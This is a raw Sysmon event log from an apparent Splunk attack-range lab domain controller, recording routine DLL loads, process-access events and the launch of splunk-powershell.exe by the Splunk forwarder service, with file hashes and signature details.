Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000100193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x8000000000000000100188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.717{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x8000000000000000100181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.232{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x8000000000000000100180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.232{326FD73D-C12D-6294-420B-000000005502}59926288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.232{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.232{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x8000000000000000100177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.060{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.060{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.060{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.060{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.060{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.060{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.060{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.060{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.044{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 